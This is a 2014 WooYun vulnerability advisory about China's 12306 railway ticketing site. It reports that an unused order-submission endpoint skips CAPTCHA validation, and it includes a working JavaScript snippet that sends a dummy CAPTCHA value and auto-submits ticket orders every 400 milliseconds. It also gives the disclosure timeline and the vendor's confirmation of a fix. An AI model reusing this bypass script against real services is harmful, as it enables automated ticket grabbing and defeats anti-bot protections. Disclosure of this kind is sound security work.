当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-049555

漏洞标题:12306订单提交逻辑设计有权限导致可以绕过验证码直接提交订单

相关厂商:中国铁道科学研究院

漏洞作者: 木鱼

提交时间:2014-01-22 16:05

修复时间:2014-03-08 16:06

公开时间:2014-03-08 16:06

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-22: 细节已通知厂商并且等待厂商处理中
2014-01-29: 厂商已经确认,细节仅向厂商公开
2014-02-08: 细节向核心白帽子及相关领域专家公开
2014-02-18: 细节向普通白帽子公开
2014-02-28: 细节向实习白帽子公开
2014-03-08: 细节向公众公开

简要描述:

12306的订单提交逻辑中,存在目前未使用的逻辑接口,且此接口对验证码没有进行任何校验,从而导致用户可以使用一定的方式绕过验证码直接提交订单,并且不需要任何排队。

详细说明:

12306的前端订单逻辑处理中,存在一个提交订单的 confirmPassenger/confirmSingle 接口。此接口目前没有在12306本身用到,但是这个接口依然可以提交订单,并且完全无需验证码。
以下代码摘自网上,经测试完全有效,提交的验证码是错误(根本没有)的,但是完全被confirmSingle接口无视。

$("#randCode2").unbind('keyup');
function bO() {if ($("#sf2").is(":checked")) {return "0X00"} else {return "ADULT"}};
$("#randCode2").on("click",
function(bR) {
$.ajax({
url: ctx+"passcodeNew/checkRandCodeAnsyn",
type: "post",
data: {
randCode: $("#randCode2").val(),
rand: "sjrand"
},
async: false,
success: function(bS) {
bb = $("#randCode2").val();
$("#back_edit").trigger("click");
$.ajax({
url: ctx + "confirmPassenger/confirmSingle",
type: "post",
data: {
passengerTicketStr: getpassengerTicketsForAutoSubmit(),
oldPassengerStr: getOldPassengersForAutoSubmit(),
tour_flag: "dc",
randCode: $("#randCode").val(),
purpose_codes: bO(),
key_check_isChange: md5Str,
train_location: location_code
},
dataType: "json",
async: true,
success: function(bR) {
otsRedirect("post", ctx + "payOrder/init?random=" + new Date().getTime(), {})
},
error: function(bR, bT, bS) {
return
}
})
$("#randCode2").removeClass("inptxt w100 error").addClass("inptxt w100");
$("#i-ok2").css("display", "block");
$("#c_error2").html("");
$("#c_error2").removeClass("error");
return
}
})

bb = $("#randCode2").val()
});
setInterval(function(){
if($('#autosubmitcheckticketinfo').css('display')!='none'){
$("#randCode2").val('xxoo');$("#randCode2").trigger('click');
}
},400);

漏洞证明:

QQ截图20140122155420.png

修复方案:

鉴于此接口目前并没有用到,建议屏蔽。

版权声明:转载请注明来源 木鱼@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-01-29 15:35

厂商回复:

当日已修复。忘记确认了。多谢!

最新状态:

暂无